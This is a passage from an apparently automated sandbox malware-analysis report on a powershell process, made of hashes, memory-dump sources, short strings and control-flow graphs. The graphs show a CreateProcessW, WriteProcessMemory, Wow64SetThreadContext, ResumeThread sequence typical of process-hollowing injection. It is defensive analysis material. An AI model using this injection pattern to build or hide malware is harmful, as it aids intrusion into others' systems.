                                                                                                                            • Opcode Fuzzy Hash: 86a362ee9108175fdb4f920c69504c1a5847f682102bb205d1977e915295c3c1
                                                                                                                            • Instruction Fuzzy Hash: B74124317003058FDF2E5A78942067ABBE6AFD1324F35847AC555CB2A1EE71CD51C7A2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: L4p$L4p$L4p
                                                                                                                            • API String ID: 0-21482590
                                                                                                                            • Opcode ID: 1ed5f5d95555d8a25348215a95fb818826e90f9561d3149111e85da7f86cfaa2
                                                                                                                            • Instruction ID: ec613d5f287e77586d6c3e2ab51e3ce5b713f373d6972978e543defca0761a8d
                                                                                                                            • Opcode Fuzzy Hash: 1ed5f5d95555d8a25348215a95fb818826e90f9561d3149111e85da7f86cfaa2
                                                                                                                            • Instruction Fuzzy Hash: F5031B78A00214AFDB55DF14C890A69F7B6FF89314F14C5AADC19AB355CB32AE42CF90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 622286565f89007509a31231bb94fbc7b7a2b26e0445e0ccfc7c37ea531e09fd
                                                                                                                            • Instruction ID: 3479f7935f48dfa0c29301a0f80386e5585fd4d2ef1ade7e550ff270cd07a329
                                                                                                                            • Opcode Fuzzy Hash: 622286565f89007509a31231bb94fbc7b7a2b26e0445e0ccfc7c37ea531e09fd
                                                                                                                            • Instruction Fuzzy Hash: 5ED1D1A1C1E3D68FDB13CF74A8646A9BFB06F22308F1848DFC4855B193E6315899DB52

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 655 267d7b-267da7 662 267da9-267daa 655->662 662->662 663 267dac-268201 662->663 665 268203-268206 663->665 666 268209-268210 663->666 665->666 667 268212-268218 666->667 668 26821b-268231 666->668 667->668 669 268233-268239 668->669 670 26823c-2682df CreateProcessW 668->670 669->670 672 2682e1-2682e7 670->672 673 2682e8-268360 670->673 672->673 680 268372-268379 673->680 681 268362-268368 673->681 682 268390 680->682 683 26837b-26838a 680->683 681->680 685 268391 682->685 683->682 685->685
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002682CC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: d87f9873d173c18f391dcb4eaafd2bf18e4a1b038dd0bbe05250ddf6b2951166
                                                                                                                            • Instruction ID: c6cb974990923c387e07dcea71a3b98a5e98b72f4371ac7aade1b6fec6242692
                                                                                                                            • Opcode Fuzzy Hash: d87f9873d173c18f391dcb4eaafd2bf18e4a1b038dd0bbe05250ddf6b2951166
                                                                                                                            • Instruction Fuzzy Hash: F7617C718052999FDB21CF68CC50BDDBFB1AF05304F1485EAD809A7251DB349E99CF61

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 686 390e5f-390e77 688 390e7e-390e80 686->688 689 390e98-390eef 688->689 690 390e82-390e88 688->690 691 390e8a 690->691 692 390e8c-390e8e 690->692 691->689 692->689
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'p$4'p
                                                                                                                            • API String ID: 0-3973980265
                                                                                                                            • Opcode ID: 1e8db670da3518968a1d1cf5ceb91466605a6205d5655da8139f81ad0bf3ed13
                                                                                                                            • Instruction ID: a1a1e9256133161f792e76832f4a32c23932203078c826ac7074023c6b8107bc
                                                                                                                            • Opcode Fuzzy Hash: 1e8db670da3518968a1d1cf5ceb91466605a6205d5655da8139f81ad0bf3ed13
                                                                                                                            • Instruction Fuzzy Hash: CEE0D833F047489ECF5EA664D1213ACBB616FD6310F65849BC4C197259CA31CD15C392

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 694 268188-268201 695 268203-268206 694->695 696 268209-268210 694->696 695->696 697 268212-268218 696->697 698 26821b-268231 696->698 697->698 699 268233-268239 698->699 700 26823c-2682df CreateProcessW 698->700 699->700 702 2682e1-2682e7 700->702 703 2682e8-268360 700->703 702->703 710 268372-268379 703->710 711 268362-268368 703->711 712 268390 710->712 713 26837b-26838a 710->713 711->710 715 268391 712->715 713->712 715->715
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002682CC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 963392458-0
                                                                                                                            • Opcode ID: 95edff39f024ed69e588b701281ff863360390e5724ea52926c338acf0dda93e
                                                                                                                            • Instruction ID: a4863335f8834b58ccfe174c2e5cc2a11dd6129100fff3325d656526d1f93dcc
                                                                                                                            • Opcode Fuzzy Hash: 95edff39f024ed69e588b701281ff863360390e5724ea52926c338acf0dda93e
                                                                                                                            • Instruction Fuzzy Hash: A05148B1901269DFDF24CF99C990BDDBBB5BF48300F1085AAE909B7250DB709A98CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 716 26853e-268586 717 268590-2685c9 WriteProcessMemory 716->717 718 268588-26858e 716->718 719 2685d2-2685f3 717->719 720 2685cb-2685d1 717->720 718->717 720->719
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002685BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: b194f927694d3e74785ce34751cec6eaaa004f69c42eb243e3453ae514c04f52
                                                                                                                            • Instruction ID: 9290a3b1203d707eb05ffd90783524ba9cbe940a14c0839b6f7dafe7385a1984
                                                                                                                            • Opcode Fuzzy Hash: b194f927694d3e74785ce34751cec6eaaa004f69c42eb243e3453ae514c04f52
                                                                                                                            • Instruction Fuzzy Hash: A22115B19103499FCF10CFA9D884BDEBBF4FB48310F54852AE819A7250D378A954CF65

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 722 268540-268586 723 268590-2685c9 WriteProcessMemory 722->723 724 268588-26858e 722->724 725 2685d2-2685f3 723->725 726 2685cb-2685d1 723->726 724->723 726->725
                                                                                                                            APIs
                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002685BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3559483778-0
                                                                                                                            • Opcode ID: c02979f7d5fccc8b8b313ac93ec0db4e2a45459a0c45b09ec6118868b3506e5d
                                                                                                                            • Instruction ID: ce8f915f07f8e58fcc6a6cc9145c24db9ca891e3f5cf304ece15f729788a95f0
                                                                                                                            • Opcode Fuzzy Hash: c02979f7d5fccc8b8b313ac93ec0db4e2a45459a0c45b09ec6118868b3506e5d
                                                                                                                            • Instruction Fuzzy Hash: CB21E3B19103099FDB10CF9AD884BDEBBF4FB48320F54842AE919A7250D378A954CBA5

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 728 2683c0-268408 729 268414-268440 Wow64SetThreadContext 728->729 730 26840a-268412 728->730 731 268442-268448 729->731 732 268449-26846a 729->732 730->729 731->732
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00268433
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: c7c43d61af337aafed85ac77d29877a09f2eef52ab15304803e8b11e859b0fae
                                                                                                                            • Instruction ID: c36b901bd6fd88c443410492991969804fbc28f796b3f1911ac91d2e857e3e82
                                                                                                                            • Opcode Fuzzy Hash: c7c43d61af337aafed85ac77d29877a09f2eef52ab15304803e8b11e859b0fae
                                                                                                                            • Instruction Fuzzy Hash: EC1147B1D1024A8FCB20CFAAD844BEEBFF0EB88320F14852AD458A3651D7789545CF61

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 734 2683c8-268408 735 268414-268440 Wow64SetThreadContext 734->735 736 26840a-268412 734->736 737 268442-268448 735->737 738 268449-26846a 735->738 736->735 737->738
                                                                                                                            APIs
                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00268433
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 983334009-0
                                                                                                                            • Opcode ID: 57f8d1add577f07a9b02a943863685b836268b572b7f1ba8466b391c83bb71d1
                                                                                                                            • Instruction ID: c5c4e6dbd864810d2344eab52a0e30805ddae452cb954565ee97e3e20ca1b8f4
                                                                                                                            • Opcode Fuzzy Hash: 57f8d1add577f07a9b02a943863685b836268b572b7f1ba8466b391c83bb71d1
                                                                                                                            • Instruction Fuzzy Hash: 7A1146B1D1020A8FCB10CF9AD844BEEFBF4EB88320F14852AD418A3240D778A545CFA1

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 740 267758-267768 call 261824 743 26776e-26777c 740->743 744 2676a8-2676e6 ResumeThread 740->744 747 267782-267785 743->747 748 26714d-267150 743->748 745 2676ef-2676fc 744->745 746 2676e8-2676ee 744->746 749 267702-267713 745->749 750 267bfb-267c02 745->750 746->745 747->748 751 267156-26784d 748->751 752 267a50-267a59 748->752 749->748 754 267719-26771c 749->754 759 26784f-267854 751->759 760 267859-267862 751->760 755 267a5f-267a72 752->755 756 267b08-267b28 752->756 754->748 755->748 755->756 768 267b33-267b36 756->768 769 267b2a-267b2f 756->769 759->748 760->756 762 267868-26786b 760->762 762->756 764 267871-267892 762->764 764->748 767 267898-26789b 764->767 767->748 770 267b53-267b6a 768->770 771 267b38 768->771 769->768 770->768 779 267b6c 770->779 771->770 772 267b6e-267b77 771->772 773 267b3f-267b4d 771->773 774 267b98-267b9d 771->774 776 267b9f-267bc1 772->776 777 267b79-267b83 772->777 773->768 778 267b4f-267b51 773->778 783 267bcf-267c50 774->783 784 267bc7-267bca 776->784 785 2670d1-2670d4 776->785 786 267b85-267b8a 777->786 787 267b8c-267b96 call 265a04 777->787 778->768 779->768 784->783 784->785 789 267bd4-267bed 785->789 790 2670da 785->790 786->768 787->774 794 267b31 787->794 789->785 792 267bf3-267bf6 789->792 790->790 792->785 794->768
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: e155b526b854c1ca19a4e4d8b29a2deb3bf3209df21a2f010a9e06cea9e4aea9
                                                                                                                            • Instruction ID: 926bca6e86cd99a80eca74af49278a2f9a3310b8c21b85b0a7df0d118a137fc3
                                                                                                                            • Opcode Fuzzy Hash: e155b526b854c1ca19a4e4d8b29a2deb3bf3209df21a2f010a9e06cea9e4aea9
                                                                                                                            • Instruction Fuzzy Hash: 29119230928245CFDB20CF54E888B9877B2BB0131CF2091D6D10D5B299C3749ED4CF51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 795 2676a8-2676e6 ResumeThread 796 2676ef-2676fc 795->796 797 2676e8-2676ee 795->797 798 267702-267713 796->798 799 267bfb-267c02 796->799 797->796 801 26714d-267150 798->801 802 267719-26771c 798->802 803 267156-26784d 801->803 804 267a50-267a59 801->804 802->801 809 26784f-267854 803->809 810 267859-267862 803->810 805 267a5f-267a72 804->805 806 267b08-267b28 804->806 805->801 805->806 818 267b33-267b36 806->818 819 267b2a-267b2f 806->819 809->801 810->806 812 267868-26786b 810->812 812->806 814 267871-267892 812->814 814->801 817 267898-26789b 814->817 817->801 820 267b53-267b6a 818->820 821 267b38 818->821 819->818 820->818 829 267b6c 820->829 821->820 822 267b6e-267b77 821->822 823 267b3f-267b4d 821->823 824 267b98-267b9d 821->824 826 267b9f-267bc1 822->826 827 267b79-267b83 822->827 823->818 828 267b4f-267b51 823->828 833 267bcf-267c50 824->833 834 267bc7-267bca 826->834 835 2670d1-2670d4 826->835 836 267b85-267b8a 827->836 837 267b8c-267b96 call 265a04 827->837 828->818 829->818 834->833 834->835 839 267bd4-267bed 835->839 840 2670da 835->840 836->818 837->824 844 267b31 837->844 839->835 842 267bf3-267bf6 839->842 840->840 842->835 844->818
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380110826.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 1012b4a94a20fe5d25a16dc3ab38340ce4e636a85a69fdbb65111c08b2e2e8b8
                                                                                                                            • Instruction ID: f1cc7674aba70628d192e24b18839072cde41bd303001ae9deff2cf0283d77a0
                                                                                                                            • Opcode Fuzzy Hash: 1012b4a94a20fe5d25a16dc3ab38340ce4e636a85a69fdbb65111c08b2e2e8b8
                                                                                                                            • Instruction Fuzzy Hash: AB013174928244CFEB208F64E8887987BB2AB0131CF3494DAD1095B295C7B55ED8CF12

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 845 392b39-392b5f 846 392b8c-392bc2 845->846 847 392b61-392b66 845->847 856 392bc8-392bd9 846->856 857 392c82-392caf 846->857 848 392b68-392b6e 847->848 849 392b7e-392b86 847->849 850 392b70 848->850 851 392b72-392b7c 848->851 853 392b8b 849->853 850->849 851->849 860 392bdb-392be1 856->860 861 392bf3-392c10 856->861 862 392cdc-392d07 857->862 863 392cb1-392cb6 857->863 864 392be3 860->864 865 392be5-392bf1 860->865 861->857 875 392c12-392c34 861->875 872 392d09-392d0e 862->872 873 392d34-392d5f 862->873 866 392cb8-392cbe 863->866 867 392cce-392cdb 863->867 864->861 865->861 870 392cc0 866->870 871 392cc2-392ccc 866->871 870->867 871->867 877 392d10-392d16 872->877 878 392d26-392d33 872->878 887 392d8c-392dc2 873->887 888 392d61-392d66 873->888 884 392c4e-392c66 875->884 885 392c36-392c3c 875->885 880 392d18 877->880 881 392d1a-392d24 877->881 880->878 881->878 900 392c68-392c6a 884->900 901 392c74-392c7f 884->901 890 392c3e 885->890 891 392c40-392c4c 885->891 904 392dcb-392ddf 887->904 905 392dc4 887->905 892 392d68-392d6e 888->892 893 392d7e-392d8b 888->893 890->884 891->884 894 392d70 892->894 895 392d72-392d7c 892->895 894->893 895->893 900->901 905->904
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: tPp
                                                                                                                            • API String ID: 0-1477601333
                                                                                                                            • Opcode ID: 230063e0664ca1e8afe06bee4f75c7d5d764fa0f259252a66ffd5e0d0a4e9887
                                                                                                                            • Instruction ID: 5f5fcbf0b15aa1ebfd3e17ed2306943489289d34700fcbf9b901fb3708a00b9d
                                                                                                                            • Opcode Fuzzy Hash: 230063e0664ca1e8afe06bee4f75c7d5d764fa0f259252a66ffd5e0d0a4e9887
                                                                                                                            • Instruction Fuzzy Hash: 8141E831A097C19FCB268F64C86066ABFB1EF87314F1A84DBD4849F2A3C6719D05C791

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 907 393000-39302f 908 39303f 907->908 909 393031-39303d 907->909 910 393041-393043 908->910 909->910 911 393049-393061 910->911 912 3930ec-3930f6 910->912 919 39313c-393184 911->919 920 393067-39306c 911->920 913 3930f8-3930fe 912->913 914 393101-393107 912->914 915 393109-39310b 914->915 916 39310d-393119 914->916 918 39311b-393139 915->918 916->918 929 393194 919->929 930 393186-393192 919->930 922 39306e-393074 920->922 923 393084-39308e 920->923 926 393078-393082 922->926 927 393076 922->927 928 393093-3930a4 923->928 926->923 927->923 928->919 939 3930aa-3930af 928->939 933 393196-393198 929->933 930->933 935 39319e-3931a0 933->935 936 393257-393261 933->936 937 3931ba-3931c3 935->937 938 3931a2-3931a8 935->938 940 39326f-393275 936->940 941 393263-39326c 936->941 944 3931c5 937->944 945 3931c7-3931d6 937->945 942 3931aa 938->942 943 3931ac-3931b8 938->943 946 3930b1-3930b7 939->946 947 3930c7-3930e9 939->947 948 39327b-393287 940->948 949 393277-393279 940->949 942->937 943->937 944->945 957 3931d8-3931e3 945->957 958 3931e5-39322b 945->958 950 3930b9 946->950 951 3930bb-3930c5 946->951 952 393289-3932a5 948->952 949->952 950->947 951->947 961 39324b-393254 957->961 969 39322d 958->969 970 393237-393241 958->970 972 393232 969->972 971 393243 970->971 970->972 971->961 972->970
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $p
                                                                                                                            • API String ID: 0-982128392
                                                                                                                            • Opcode ID: 21521942385f96b3986934b745c8c5d5eda217f53787aef05668b72b5870bcb8
                                                                                                                            • Instruction ID: 256235d4433a4d21057b7e7817c00787a9256a1fd8ec2c6f9f58e0aae96ad206
                                                                                                                            • Opcode Fuzzy Hash: 21521942385f96b3986934b745c8c5d5eda217f53787aef05668b72b5870bcb8
                                                                                                                            • Instruction Fuzzy Hash: 082183752093809FDB168B24C850926BFA5EF86314B1EC1EBD445CF353C636CD46C752

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 973 393020-39302f 974 39303f 973->974 975 393031-39303d 973->975 976 393041-393043 974->976 975->976 977 393049-393061 976->977 978 3930ec-3930f6 976->978 985 39313c-393184 977->985 986 393067-39306c 977->986 979 3930f8-3930fe 978->979 980 393101-393107 978->980 981 393109-39310b 980->981 982 39310d-393119 980->982 984 39311b-393139 981->984 982->984 995 393194 985->995 996 393186-393192 985->996 988 39306e-393074 986->988 989 393084-39308e 986->989 992 393078-393082 988->992 993 393076 988->993 994 393093-3930a4 989->994 992->989 993->989 994->985 1005 3930aa-3930af 994->1005 999 393196-393198 995->999 996->999 1001 39319e-3931a0 999->1001 1002 393257-393261 999->1002 1003 3931ba-3931c3 1001->1003 1004 3931a2-3931a8 1001->1004 1006 39326f-393275 1002->1006 1007 393263-39326c 1002->1007 1010 3931c5 1003->1010 1011 3931c7-3931d6 1003->1011 1008 3931aa 1004->1008 1009 3931ac-3931b8 1004->1009 1012 3930b1-3930b7 1005->1012 1013 3930c7-3930e9 1005->1013 1014 39327b-393287 1006->1014 1015 393277-393279 1006->1015 1008->1003 1009->1003 1010->1011 1023 3931d8-3931e3 1011->1023 1024 3931e5-39322b 1011->1024 1016 3930b9 1012->1016 1017 3930bb-3930c5 1012->1017 1018 393289-3932a5 1014->1018 1015->1018 1016->1013 1017->1013 1027 39324b-393254 1023->1027 1035 39322d 1024->1035 1036 393237-393241 1024->1036 1038 393232 1035->1038 1037 393243 1036->1037 1036->1038 1037->1027 1038->1036
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $p
                                                                                                                            • API String ID: 0-982128392
                                                                                                                            • Opcode ID: e49610d69e09245850777aa32265d7ed1df6a2f1d030a64b0a0cb1b5c1dff30d
                                                                                                                            • Instruction ID: 14507cdc5ff644d3672322cb329e998f4328149ded6797dc11de31db945ab58e
                                                                                                                            • Opcode Fuzzy Hash: e49610d69e09245850777aa32265d7ed1df6a2f1d030a64b0a0cb1b5c1dff30d
                                                                                                                            • Instruction Fuzzy Hash: 0D116075300210AFEB15CF59C881E26F7AAEB85354B19C16AE80A8B355CB32DE42C791
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c634dae86eb22fe79a364247e75ba7137c8e82ac979a539fb23b3d00d6c7a5f
                                                                                                                            • Instruction ID: a0885e59a93a4e33f758f3656c300a9db761d94cac37434267b61f7f25d1ac4a
                                                                                                                            • Opcode Fuzzy Hash: 0c634dae86eb22fe79a364247e75ba7137c8e82ac979a539fb23b3d00d6c7a5f
                                                                                                                            • Instruction Fuzzy Hash: 4D316B30A00246DFCF36CF5AD448BAABBB6BB44304F56C06AE944672A0C372DD95CB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ac77ae08e00c824d7dd49372af6e8d79f0402528397c8734a8375989aca5141
                                                                                                                            • Instruction ID: 942d4c0cef5a164006c5f22b131a329a9c5768fbc66f8fbe25dfdb591beee0d1
                                                                                                                            • Opcode Fuzzy Hash: 0ac77ae08e00c824d7dd49372af6e8d79f0402528397c8734a8375989aca5141
                                                                                                                            • Instruction Fuzzy Hash: E021CD31600246DFDF3A8F46E448BA97BB2BF40308F56C06AE9452A2A0C372CDD5DF81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380075343.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_1ed000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b3d013deaf21e31f9ba07832edd8a3ca397564f5d6f0313e4309dc64939308a6
                                                                                                                            • Instruction ID: a7675e1d095835240224b8d123295b57860a28c4894a29469eb6149fd6e3fcb4
                                                                                                                            • Opcode Fuzzy Hash: b3d013deaf21e31f9ba07832edd8a3ca397564f5d6f0313e4309dc64939308a6
                                                                                                                            • Instruction Fuzzy Hash: 75018F71504784AAE7245E2AE884B6BBFD8EF41724F2C841AFC494B286C7799845CAB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380075343.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_1ed000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 20d188b2e3fabb4f075ef0e136f7ba847c1b8be96b8416e9a4af639895c599d2
                                                                                                                            • Instruction ID: e75dc2e70c57271e547e880057a407fbf5800d2607b219d48ffaadcb585cff9e
                                                                                                                            • Opcode Fuzzy Hash: 20d188b2e3fabb4f075ef0e136f7ba847c1b8be96b8416e9a4af639895c599d2
                                                                                                                            • Instruction Fuzzy Hash: C101297140E3C09FD7128B259C94B66BFB4DF43224F1D81DBE8888F2A7C2699848C772
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <*$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$tPp$tPp$$p$$p$$p$$p$$p$$p$$p
                                                                                                                            • API String ID: 0-3323901103
                                                                                                                            • Opcode ID: fae01e6af0cd47338915119a7ab46864737748abe48be87a1d91735b7067f2d9
                                                                                                                            • Instruction ID: 3ff7e3effbca8d5ec208adbb3fce2353d17560161d1ffefb40064331f56de87a
                                                                                                                            • Opcode Fuzzy Hash: fae01e6af0cd47338915119a7ab46864737748abe48be87a1d91735b7067f2d9
                                                                                                                            • Instruction Fuzzy Hash: 7FF126B1B082419FCF268B6994507AABFB6EFC5310F29846FD445CB242DB71CE46C7A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.380146591.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_390000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (:*$(:*$(:*$4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$L:*$L:*$L:*$p:*$$p$$p
                                                                                                                            • API String ID: 0-3934114423
                                                                                                                            • Opcode ID: 5898e57c2f86a072146335654a2a2dbe6e1b00af4f44d56d30a9188c5aa0f3e7
                                                                                                                            • Instruction ID: a01ca216860b8c6d052443eb7cfedcf7abe74b89a77939c0ea73b7daa29288c8
                                                                                                                            • Opcode Fuzzy Hash: 5898e57c2f86a072146335654a2a2dbe6e1b00af4f44d56d30a9188c5aa0f3e7
